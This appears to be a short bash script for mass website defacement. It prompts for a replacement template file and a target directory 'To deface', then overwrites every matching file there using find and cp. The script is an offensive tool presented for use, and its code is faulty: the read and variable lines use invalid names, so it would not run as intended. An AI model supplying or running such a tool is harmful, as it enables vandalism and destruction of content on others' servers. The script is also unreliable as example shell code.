#!/bin/bash
echo '[+] your deposit.tpl path on the server'
read deposit.tpl 
echo
echo '[+] enter the path To deface '
read path
echo
echo '[+] Starting ........'
find $path -name "deposit.tpl.*" -exec cp $deposit.tpl {} \;
echo 
echo '[+] Done !'